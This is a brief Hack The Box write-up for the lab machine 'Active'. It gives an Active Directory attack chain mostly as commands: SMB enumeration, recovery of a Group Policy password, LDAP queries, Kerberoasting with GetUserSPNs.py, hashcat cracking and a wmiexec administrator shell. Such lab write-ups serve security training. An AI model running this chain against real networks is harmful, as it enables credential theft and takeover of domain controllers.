Hack The Box: Active




Difficulty: Medium

Machine Creator: eks & mrb3n

Tools Used:

NMAP

SMBCLIENT

gpp-decrypt

smbmap

ldapsearch

GetUserSPN.py

Hashcat

wmiexec.py

Task: To find User.txt and Root.txt

Network Enumeration

Let’s start with an NMAP scan.

nmap -sV -sC 10.10.10.100

The nmap scan shows us some impressive results. We can see port 53 Microsoft DNS, port 88 Kerberos, and port 389,3268 LDAP. From all these ports we can expect this server to be a domain controller for the domain active.htb.


SMB

SMB port 445 is also on this box lets see if we can access any open shares.

smbclient -L //10.10.10.100 smbclient //10.10.10.100/Replication




Group Policy



CPASSWORD

https://msdn.microsoft.com/en-us/library/cc422924.aspx


SMBMAP

smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.10.10.100


LDAPSEARCH

ldapsearch -x -h 10.10.10.100 -p 389 -D ‘SVC_TGS’ -w ‘GPPstillStandingStrong2k18’ -b “dc=active,dc=htb” -s sub”(&(objectCategory=person)(objectClass=user)(!(useraccountcontrol:1.2.840.1 13556.1.4.803:=2))(serviceprincipalname=*/*))” serviceprincipalname | grep -B 1 servicePrincipalName


GetUserSPNs.py

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetUserSPNs.py

https://github.com/SecureAuthCorp/impacket/tree/master/impacket
python GetUserSPNs.py active.htb/svc_tgs -dc-ip 10.10.10.100 -request


Hashcat

hashcat64.exe -a 0 -m 13100 active_hash.txt rockyou.txt



wmiexec.py

python wmiexec.py active.htb/administrator:[email protected]

User.txt/Root.txt